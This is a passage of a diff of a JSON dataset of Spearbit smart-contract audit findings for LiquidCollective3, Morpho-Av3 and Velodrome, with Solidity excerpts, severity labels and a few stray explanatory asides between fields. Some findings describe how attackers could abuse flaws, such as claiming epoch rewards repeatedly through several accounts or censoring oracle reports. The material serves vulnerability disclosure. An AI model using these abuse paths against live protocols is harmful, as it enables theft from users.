cases, the user would have performed a borrow even if the borrow operation was not allowed on the underlying Aave pool.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Use function addressToBytes32", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function dispatch() of SpokeConnector contains an explicit conversion from address to bytes32. There is also a function addressToBytes32() that does the same and is more readable. function dispatch(...) ... { bytes memory _message = Message.formatMessage( ... bytes32(uint256(uint160(msg.sender))), ... );", + "title": "_updateInDS does not \"bubble up\" the updated values of onPool and inP2P", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The _updateInDS function takes as input uint256 onPool and uint256 inP2P that are passed by value, not by reference. function _updateInDS( address poolToken, address user, LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, uint256 onPool, uint256 inP2P, bool demoting ) internal { if (onPool <= Constants.DUST_THRESHOLD) onPool = 0; if (inP2P <= Constants.DUST_THRESHOLD) inP2P = 0; // ... other logic of the function } Those values, if lower than or equal to Constants.DUST_THRESHOLD, will be set to 0. The issue is that the updated version of onPool and inP2P is never bubbled up to the original caller that will later use those values that could have been changed by the _updateInDS logic. For example, the _updateBorrowerInDS function calls _updateInDS and relies on the value of onPool and inP2P to understand if the user should be removed or added to the list of borrowers. function _updateBorrowerInDS(address underlying, address user, uint256 onPool, uint256 inP2P, bool 
demoting) internal { _updateInDS( _market[underlying].variableDebtToken, user, _marketBalances[underlying].poolBorrowers, _marketBalances[underlying].p2pBorrowers, onPool, inP2P, demoting ); if (onPool == 0 && inP2P == 0) _userBorrows[user].remove(underlying); else _userBorrows[user].add(underlying); } Let's assume that inP2P and onPool passed as _updateBorrowerInDS inputs were equal to 1 (the value of DUST_THRESHOLD). In this case, _updateInDS would update those values to zero because 1 <= DUST_THRESHOLD and would remove the user from both the poolBucket and p2pBuckets of the underlying. When the function then returns in the _updateBorrowerInDS context, the same user would not remove the underlying from his/her _userBorrows list of assets because the updated values of onPool and inP2P have not been bubbled up by the _updateInDS function. The same conclusion could be made for all the \"root\"-level code paths that rely on the onPool and inP2P values that have not been updated with the new 0 value set by _updateInDS.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Low Risk" ] }, { - "title": "_pickNextValidatorsToExitFromActiveOperators uses the wrong index to query stopped validator count for operators", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "operators does not necessarily have the same order as the actual OperatorsV2's operators, since the ones that don't have _hasExitableKeys will be skipped (the operator might not be active or all of its funded keys might have been requested to exit). And so when querying the stopped validator counts for (uint256 idx = 0; idx < exitableOperatorCount;) { uint32 currentRequestedExits = operators[idx].requestedExits; uint32 currentStoppedCount = _getStoppedValidatorsCountFromRawArray(stoppedValidators, idx); one should not use the idx in the cached operator's array, but the cached index of this array element, as the indexes of stoppedValidators correspond to the actual stored operator's array in storage. Note that when emitting the UpdatedRequestedValidatorExitsUponStopped event, the correct index has been used.", + "title": "There is no guarantee that the _rewardsManager is set when calling claimRewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Since the _rewardsManager address is set using a setter function in Morpho only and not in the MorphoStorage.sol constructor, there is no guarantee that the _rewardsManager is not the default address(0) value. This could cause failures when calling claimRewards if Morpho forgets to set the _rewardsManager.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Critical Risk" + "Morpho-Av3", + "Severity: Low Risk" ] }, { - "title": "Oracles' reports votes are not stored in storage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The purpose of Oracle.1.sol is to facilitate the reporting and quorum of oracles. Oracles periodically add their reports and when consensus is reached the setConsensusLayerData function (which is a critical component of the system) is called.
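For context, Solidity getters that return a storage array by value hand back a memory copy, so mutating the result does not persist; a generic illustration (hypothetical names, not the project's code): function bumpVote(uint256 idx) internal { ReportVariant[] memory variants = ReportVariants.get(); // memory copy variants[idx].votes += 1; // mutates only the copy; storage is untouched }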
However, there is an issue with the current implementation as ReportVariants holds the reports made by oracles but ReportVariants.get() returns a memory array instead of a storage array, therefore resulting in an increase in votes that will not be stored at the end of the transaction and preventing setConsensusLayerData from being called. This is a regression bug that should have been detected by a comprehensive test suite.", + "title": "It's impossible to set _isClaimRewardsPaused", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The claimRewards function checks the isClaimRewardsPaused boolean value and reverts if it is true. Currently, there is no setter function in the code base that sets the _isClaimRewardsPaused boolean, so it is impossible to change.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Critical Risk" + "Morpho-Av3", + "Severity: Low Risk" ] }, { - "title": "User's LsETH might be locked due to out-of-gas error during recursive calls", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Let W0, W1, ...W7 represent the withdrawal events in the withdrawal stack. Let R0, R1, R2 represent the users' redeem requests in the redeem queue. Assume that Alice is the owner of R1. When Alice called the resolveRedeemRequests function against R1, it will resolve to W1. Next, Alice called the _claimRedeemRequest function with R1 and its corresponding W1. The _claimRedeemRequest will first process W1. At the end of the function, it will check if W1 matches all the amounts of R1. If not, it will call the _claimRedeemRequest function recursively with the same request id (R1) but increment the withdrawal event id (W2 = W1 + 1). The _claimRedeemRequest function recursively calls itself until all the amount of the redeem request is \"expended\" or the next withdrawal event does not exist. In the above example, the _claimRedeemRequest will be called 7 times with W1...W7, until all the amount of R1 is \"expended\" (R1.amount == 0). However, if the amount of a redeem request is large (e.g. 1000 LsETH), and this redeem request is satisfied by many small chunks of withdrawal events (e.g. one withdrawal event consists of less than 10 LsETH), then the recursion depth will be large. The function will keep calling itself recursively until an out-of-gas error happens. If this happens, there is no way to claim the redemption request, and the user's LsETH will be locked. In the current implementation, users cannot break the claim into smaller chunks to overcome the gas limit. In the above example, if Alice attempts to break the claim into smaller chunks by first calling the _claimRedeemRequest function with R1 and its corresponding W5, the _isMatch function within it will revert.", + "title": "User rewards can be claimed to treasury by DAO", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When a user claims rewards, the rewards for the entire Morpho contract position on Aave are claimed. The excess rewards remain in the Morpho contract until all users have claimed their rewards.
These rewards are not tracked and can be withdrawn by the DAO through a claimToTreasury call.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: High Risk" + "Morpho-Av3", + "Severity: Low Risk" ] }, { - "title": "Allowed users can directly transfer their share to RedeemManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "An allowed user can directly transfer its shares to the RedeemManager without requesting a redeem. This would cause the withdrawal stack to grow, since the redeem demand, which is calculated based on the RedeemManager's share of LsETH, increases. RedeemQueue would be untouched in this case. In case of an accidental mistake by a user, the locked shares can only be retrieved by a protocol update.", + "title": "decreaseDelta lib function should return early if amount == 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The passed-in amount should be checked for a zero value, and in that condition, the function should return early. As currently written, it unnecessarily consumes more gas and emits change events for values that don't end up changing (newScaledDelta). Checking for amount == 0 is already being done in the increaseDelta function.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Medium Risk" + "Morpho-Av3", + "Severity: Gas Optimization" ] }, { - "title": "Invariants are not enforced for stopped validator counts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "_setStoppedValidatorCounts does not enforce the following invariants: stoppedValidatorCounts[0] <= DepositedValidatorCount.get() stoppedValidatorCounts[i] needs to be a non-decreasing function when viewed on a timeline stoppedValidatorCounts[i] needs to be less than or equal to the funded number of validators for the corresponding operator. Currently, the oracle members can report values that would break these invariants. As a consequence, the oracle members can signal the operators to exit more or fewer validators by manipulating the preExitingBalance value. And the activeCount used by the exiting-validator picking algorithm can also be manipulated per operator.", + "title": "Smaller gas optimizations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "There are several small expressions that can be further gas optimized.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Medium Risk" + "Morpho-Av3", + "Severity: Gas Optimization" ] }, { - "title": "Potential out of gas exceptions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The purpose of _requestExitsBasedOnRedeemDemandAfterRebalancings is to release liquidity for withdrawals made in the RedeemManager contract. The function prioritizes liquidity sources, starting with BalanceToRedeem and then BalanceToDeposit, before asking validators to exit. However, if the validators are needed to release more liquidity, the function uses pickNextValidatorsToExit to determine which validators to ask to exit. This process can be quite gas-intensive, especially if the number of validators is large.
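In shape, the selection amounts to a doubly nested scan; a simplified sketch for intuition (not the audited code): for (uint256 i = 0; i < exitableOperatorCount; ++i) { for (uint256 j = 0; j < stoppedValidators.length; ++j) { /* per-(operator, entry) work, dominated by storage reads */ } }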
The gas consumption of this function depends on several factors, including exitableOperatorCount, stoppedValidators.length, and the rate of decrease of _count. These factors may increase over time, and the msg.sender does not have control over them. The function includes two nested loops that contribute to the overall gas consumption, and this can be problematic for certain inputs. For example, if the operators array has no duplications and the difference between values is exactly 1, such as [n, n-1, n-2 ... n-k] where n can be any number and k is a large number equal to exitableOperatorCount - 1, and _count is also large, the function can become extremely gas-intensive. The main consequence of such a potential issue is that the function may not release enough liquidity to the RedeemManager contract, resulting in partial fulfillment of redemption requests. Similarly, _pickNextValidatorsToDepositFromActiveOperators is also very gas intensive. If the number of desired validators and current operators (including fundable operators) are high enough, depositToConsensusLayer is no longer callable.", + "title": "Gas: Optimize LogarithmicBuckets.getMatch", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The getMatch function of the logarithmic bucket first checks for a bucket that is the next higher bucket than the bucket the provided value would be in. If no higher bucket is found, it searches for the highest bucket that \"is in both bucketsMask and lowerMask.\" However, we already know that any bucket we can now find will be in lowerMask, as lowerMask is the mask corresponding to all buckets less than or equal to value's bucket. Instead, we can just directly look for the highest bucket in bucketsMask.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Medium Risk" + "Morpho-Av3", + "Severity: Gas Optimization" ] }, { - "title": "The validator count to exit in _requestExitsBasedOnRedeemDemandAfterRebalancings assumes that the to-be selected validators are still active and have not been penalised.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The validatorCountToExit is calculated as follows uint256 validatorCountToExit = LibUint256.ceil( redeemManagerDemandInEth - (availableBalanceToRedeem + exitingBalance + preExitingBalance), DEPOSIT_SIZE ); This formula assumes that the validators to be selected by pickNextValidatorsToExit: 1. Are still active 2. Have not been queued to be exited and 3. Have not been penalized and their balance is at least MAX_EFFECTIVE_BALANCE", + "title": "Consider reverting the supplyCollateralLogic execution when amount.rayDivDown(poolSupplyIndex) is equal to zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "In Aave, when an AToken/VariableDebtToken is minted or burned, the transaction will revert if the amount divided by the index is equal to zero. You can see the check in the implementation of the _mintScaled and _burnScaled functions in the Aave codebase. Morpho, with PR 688, has decided to prevent supply to the pool in this scenario to avoid a revert of the operation. Before the PR, if the user had supplied an amount for which amount.rayDivDown(poolSupplyIndex) would be equal to zero, the operation would have reverted at the Aave level during the mint operation of the AToken.
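For reference, the Aave-v3-style guard inside _mintScaled is of this shape (a paraphrased sketch, not a verbatim quote): uint256 amountScaled = amount.rayDiv(index); require(amountScaled != 0, Errors.INVALID_MINT_AMOUNT);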
With the PR, the operation will proceed because the supply to the Aave pool is skipped (see PoolLib.supplyToPool). Allowing this scenario in this specific context for the supplyCollateralLogic function will bring the following side effects: The supplied user's amount will remain in Morpho's contract and will not be supplied to the Aave pool. The user's accounting system is not updated because collateralBalance is increased by amount.rayDivDown(poolSupplyIndex), which is equal to zero. If the marketBalances.collateral[onBehalf] was equal to zero (the user has never supplied the underlying to Morpho), the underlying token would be wrongly added to the _userCollaterals[onBehalf] storage, even if the amount supplied to Morpho (and to Aave) is equal to zero. The user will not be able to withdraw the provided amount because the amount has not been accounted for in the storage. The Events.CollateralSupplied event is emitted even if the amount (used as an event parameter) has not been accounted to the user.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Burn RedeemManager's share first before calling its reportWithdraw endpoint", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The current implementation of _reportWithdrawToRedeemManager calls RedeemManager's reportWithdraw and then burns the corresponding shares for the RedeemManager: // perform a report withdraw call to the redeem manager redeemManager_.reportWithdraw{value: suppliedRedeemManagerDemandInEth}(suppliedRedeemManagerDemand); // we burn the shares of the redeem manager associated with the amount of eth provided _burnRawShares(address(RedeemManagerAddress.get()), suppliedRedeemManagerDemand);", + "title": "WETHGateway does not validate the constructor's input parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The current implementation of the WETHGateway contract does not validate the user's parameters in the constructor. In this specific case, the constructor should revert if the morpho address is equal to address(0).", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "OracleManager allows reporting for the same epoch multiple times, leading to unknown behavior.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Currently, it is possible for the oracle to report on the same epoch multiple times, because _isValidEpoch checks that the report's epoch >= LastConsensusLayerReport.get().epoch. This can lead the contract to unspecified behavior: the code will revert if the report increases the balance (not with an explicit check, but due to a subtraction underflow, since maxIncrease == 0), while allowing other code paths to execute to completion.", + "title": "Missing/wrong natspec, typos, minor refactors and renaming of variables to be more meaningful", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "In general, the current codebase does not cover all the functions, events, structs, or state variables with proper natspec.
Below you can find a list of small specific improvements regarding typos, missing/wrong natspec, or suggestions to rename variables to a more meaningful/correct name: RewardsManager.sol#L28: consider renaming the balance variable in UserAssetBalance to scaledBalance. PositionsManagerInternal.sol#L289-L297, PositionsManagerInternal.sol#L352-L362: consider better documenting this part of the code because at first sight it's not crystal clear why the code is structured in this way. For more context, see the PR comment in the spearbit audit repo linked to it. MorphoInternal.sol#L469-L521: consider moving the _calculateAmountToSeize function from the MorphoInternal to the PositionsManagerInternal contract. This function is only used internally by the PositionsManagerInternal. Note that there could be more instances of these kinds of \"refactoring\" of the code inside other contracts.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Missing event emit when user calls deposit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Whenever BalanceToDeposit is updated, the protocol should emit a SetBalanceToDeposit, but when a user calls UserDepositManager.deposit, the event is never emitted, which could break tooling.", + "title": "No validation checks on the newDefaultIterations struct", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The initialize function takes in a newDefaultIterations struct and does not perform validation for any of its fields.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Reset the report data and increment the last epoch id before calling River's setConsensusLayerData when a quorum is made", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The current implementation of reportConsensusLayerData calls river.setConsensusLayerData(report) first when a quorum is made, then resets the report variant and position data, and increments the last epoch id afterward // if adding this vote reaches quorum if (variantVotes + 1 >= quorum) { // we push the report to river river.setConsensusLayerData(report); // we clear the reporting data _clearReports(); // we increment the lastReportedEpoch to force reports to be on the last frame LastEpochId.set(lastReportedEpochValue + 1); emit SetLastReportedEpoch(lastReportedEpochValue + 1); } In a future version of the protocol there might be a possibility for an oracle member to call back into reportConsensusLayerData when river.setConsensusLayerData(report) is called, and so it would open a reentrancy for compromised/malicious oracle members.", + "title": "No validation check for newPositionsManager address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The initialize function does not ensure that the newPositionsManager is not a 0 address.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Update BufferedExceedingEth before calling sendRedeemManagerExceedingFunds", - "html_url":
"https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "In pullExceedingEth , River's sendRedeemManagerExceedingFunds is called before updating the RedeemManager's BufferedExceedingEth storage value _river().sendRedeemManagerExceedingFunds{value: amountToSend}(); BufferedExceedingEth.set(BufferedExceedingEth.get() - amountToSend);", + "title": "Missing Natspec function documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The repayLogic function currently has Natspec documentation for every function argument except for the repayer argument.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Any oracle member can censor almost quorum report variants by resetting its address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The admin or an oracle member can DoS or censor almost quorum reports by calling setMember endpoint which would reset the report variants and report positions. The admin also can reset the/clear the reports by calling other endpoints by that should be less of an issue compared to just an oracle member doing that.", + "title": "approveManagerWithSig user experience could be improved", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "With the current implementation of the approveManagerWithSig signers must wait that the previous signers have consumed the nonce to be able to call approveManagerWithSig. Inside the function, there's a specific check that will revert if the signature has been signed with a nonce that is not equal to the current one assigned to the delegator, this means that signatures that use \"future\" nonce will not be able to be approved until previous nonce has been consumed. uint256 usedNonce = _userNonce[signatory]++; if (nonce != usedNonce) revert Errors.InvalidNonce(); Let's make an example: delegator want to allow 2 managers via signature 1) Generate sig_0 for manager1 with nonce_0. 2) Generate sig_1 for manager2 with nonce_1. 3) If no-one executes approveManagerWithSig(sig_0) the sig_1 (and all the signatures based on incremented nonces) cannot be executed. 
It's true that at some point someone/the signer will execute it.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Incentive mechanism that encourages operators to respond quickly to exit requests might diminish under certain conditions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "File: Operators.2.sol 153: /// @notice Retrieve all the active and fundable operators 154: /// @dev This method will return a memory array of length equal to the number of operators, but 155: /// @dev populated up to the fundable operator count, also returned by the method 156: /// @return The list of active and fundable operators 157: /// @return The count of active and fundable operators 158: function getAllFundable() internal view returns (CachedOperator[] memory, uint256) { ..SNIP.. 172: uint32[] storage stoppedValidatorCounts = getStoppedValidators(); 173: for (uint256 idx = 0; idx < operatorCount;) { 174: ..SNIP.. 175: if ( 176: _hasFundableKeys(r.value[idx]) && 177: _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits 178: ) { r.value[idx].requestedExits is the accumulative number of requested validator exits by the protocol. The _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) function returns a value reported by oracle members which consists of both exited and slashed validator counts. It was understood that the rationale of having the _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits conditional check at Line 177 above is to incentivize operators to respond quickly to exit requests if they want new stakes from deposits. In other words, an operator with a requestedExits value larger than the _getStoppedValidatorCountAtIndex count indicates that the operator did not submit exit requests to the Consensus Layer (CL) in a timely manner or the exit requests have not been finalized in CL. However, it was observed that the incentive mechanism might not work as expected in some instances. Consider the following scenario: Assuming an operator called A has 5 slashed validators and 0 exited validators, the _getStoppedValidatorCountAtIndex function will return 5 for A since this function takes into consideration both stopped and slashed validators. Also, assume that the requestedExits of A is 5, which means that A has been instructed by the protocol to submit 5 exit requests to CL. In this case, the incentive mechanism seems to diminish as A will still be considered a fundable operator even if A does not respond to exit requests, since the number of slashed validators is enough to push up the stopped validator count to satisfy the condition, giving the wrong impression that A has already submitted the exit requests. As such, A will continue to be selected to stake new deposits.", + "title": "Missing user markets check when liquidating", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The liquidation does not check if the user who gets liquidated actually joined the collateral and borrow markets.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "RedeemManager.
_claimRedeemRequests transaction sender might be tricked to pay more eth in transaction fees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The _claimRedeemRequests function is designed to allow anyone to claim ETH on behalf of another party who has a valid redeem request. The function iterates through the redeemRequestIds list and fulfills each request individually. However, it is important to note that the transfer of ETH to the recipients is only limited by the 63/64 rule, which means that it is possible for a recipient to take advantage of a heavy fallback function and potentially cause the sender to pay a significant amount of unwanted transaction fees.", + "title": "Consider reverting instead of returning zero inside the repayLogic, withdrawLogic, withdrawCollateralLogic and liquidateLogic functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The position manager always checks the user inputs via different validation functions. One of the validations is that the input's amount must be greater than zero; otherwise, the transaction reverts with revert Errors.AmountIsZero(). The same behavior is not followed in those cases where the re-calculated amount is still zero. For example, in repayLogic after re-calculating the max amount that can be repaid by executing amount = Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount); In this case, Morpho simply executes if (amount == 0) return 0; Note that liquidateLogic should be handled differently because both the borrow amount and/or the collateral amount could be equal to zero. In this case, it would be better to revert with a different custom error based on which of the two amounts is equal to zero.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Claimable LsETH on the Withdraw Stack could exceed total LsETH requested on the Redeem Queue", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Let the total amount of claimable LsETH on the Withdraw Stack be x and the total amount of LsETH requested on the Redeem Queue be y. The following points are extracted from the Withdrawals Smart Contract Architecture documentation: The design ensures that x <= y. Refer to page 15 of the documentation. It is impossible for a redeem request to be claimed before at least one Oracle report has occurred, so it is impossible to skip a slashing time penalty. Refer to page 16 of the documentation. Based on the above information, the main purpose of the design (x <= y) is to avoid favorable treatment of LsETH holders that would request a redemption before others following a slashing incident. However, this constraint (x <= y) is not being enforced in the contract. The reporter could continue to report withdrawal via the RedeemManager.reportWithdraw function until the point x > y. If x > y, LsETH holders could request a redemption before others following a slashing incident to gain an advantage.", + "title": "PERMIT2 operations like transferFrom2 and simplePermit2 will revert if amount is greater than type(uint160).max", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Both Morpho.sol and PositionsManager.sol use the Permit2 lib.
The current implementation of the permit2 lib explicitly restricts the amount of tokens to uint160 by calling amount.toUint160(). On Morpho, the amount is expressed as a uint256 and the user could, in theory, pass an amount that is greater than type(uint160).max. By doing so, the transaction would revert when it interacts with the permit2 lib.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "An oracle member can resubmit data for the same epoch multiple times if the quorum is set to 1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "If the quorum is set to 1 and the difference between the report's epoch e and LastEpochId.get() is Δe, an oracle member will be able to call reportConsensusLayerData Δe + 1 times to push its report for epoch e to the protocol and with different data each time (the only restriction on successive reports is that the difference of underlying balance between reports would need to be negative, since the maxIncrease will be 0). Note that in reportConsensusLayerData the first storage write to LastEpochId will be overwritten later due to the quorum of one: x = LastEpochId -> report.epoch -> x + 1", + "title": "Both _wrapETH and _unwrapAndTransferETH do not check if the amount is zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Both _wrapETH and _unwrapAndTransferETH are not checking if the amount of tokens is greater than zero. If the amount is equal to zero, Morpho should avoid making the external call or simply revert.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Report's validatorsCount's historical non-decreasingness does not get checked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Once the Oracle members come to a quorum for a selected report variant, the validators count is stored in the storage. Note that validatorsCount is supposed to represent the total cumulative number of validators ever funded on the consensus layer (even if they have been slashed or exited at some point). So this value is supposed to be a non-decreasing function of reported epochs. But this invariant has never been checked in setConsensusLayerData.", + "title": "Document further constraints on BucketDLL's insert and remove functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Besides the constraint that id may not be zero, there are further constraints that are required for the insert and remove functions to work correctly: insert: \"This function should not be called with an _id that is already in the list.\" Otherwise, it would overwrite the existing _id.
remove: \"This function should not be called with an _id that is not in the list.\" Otherwise, it would set all of _list.accounts[0] to address(0), i.e., mark the list as empty.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "The report's slashingContainmentMode and bufferRebalancingMode are decided by the oracle mem- bers which affects the exiting strategy of validators", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The current protocol leaves it up to the oracle members to come to a quorum to set either of the report.slashingContainmentMode or report.bufferRebalancingMode to true or false. That means the oracle members have the power to decide off-chain whether validators should be exited and whether some of the deposit balance should be reallocated for redeeming (vs an algorithmic decision by the protocol on-chain). A potential bad scenario would be oracle members deciding to not signal for new validators to exit and from the time for the current epoch to the next report some validators get penalized or slashed which would reduce the If those validators would have exited before getting slashed or penalized, the underlying value of the shares. redeemers would have received more ETH back for their investment.", + "title": "Reward calculates earned incorrectly on each epoch boundary", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Rewards are allocated on a per epoch basis to users in proportion to their total deposited amount. Because the balance and total supply used for rewards is based on _currTs % WEEK + WEEK, the values will not represent the end of the current epoch, but instead the first second of the next epoch. As a result, if a user deposits at any epoch boundary, their deposited amount will actually contribute to the check- pointed total supply of the prior epoch. This leads to a few issues which are detailed below: Users who deposit in the first second of the next epoch will dilute the total supply for the prior epoch while not being eligible to claim rewards for that same epoch. Consequently, some rewards will be left unclaimed and locked within the contract as the tokenRewardsPerEpoch mapping is used to store reward amounts so unclaimed rewards will not roll over to future epochs. Users can also avoid zero numEpochs by depositing a negligible amount at an earlier epoch for multiple ac- counts before attempting to deposit a larger amount at _currTs % WEEK == 0. The same user can withdraw their deposit from the VotingEscrow contract with the claimed rewards and re-deposit these funds into an- other account in the same block. They are able to abuse this issue to claim all rewards allocated to each epoch. In a similar fashion, reward distributions that are weighted by users' votes in the Voter contract can suffer the same issue as outlined above. If the attacker votes some negligible amount on various pools using several accounts, they can increase the vote, claim, reset the vote and re-vote via another account to claim rewards multiple times. The math below shows that _currTs + WEEK is indeed the first second of the next epoch and not the last of the prior epoch. 
uint256 internal constant WEEK = 7 days; function epochStart(uint256 timestamp) internal pure returns (uint256) { return timestamp - (timestamp % WEEK); } epochStart(123) Type: uint Hex: 0x0 Decimal: 0 epochStart(100000000) Type: uint Hex: 0x5f2b480 Decimal: 99792000 WEEK Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(WEEK) Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(1 + WEEK) Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(0 + WEEK) Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(WEEK - 1) Type: uint Hex: 0x0 Decimal: 0", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Velodrome", + "Severity: Critical Risk" ] }, { - "title": "Anyone can call depositToConsensusLayer and potentially push wrong data on-chain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Anyone can call depositToConsensusLayer and potentially push wrong data on-chain. An example is when an operator would want to remove a validator key that is not funded yet but has an index below the operator limit and will be picked by the strategy if depositToConsensusLayer is called. Then anyone can front-run the removal call by the operator and force-push this validator's info to the deposit contract.", + "title": "DOS attack by delegating tokens at 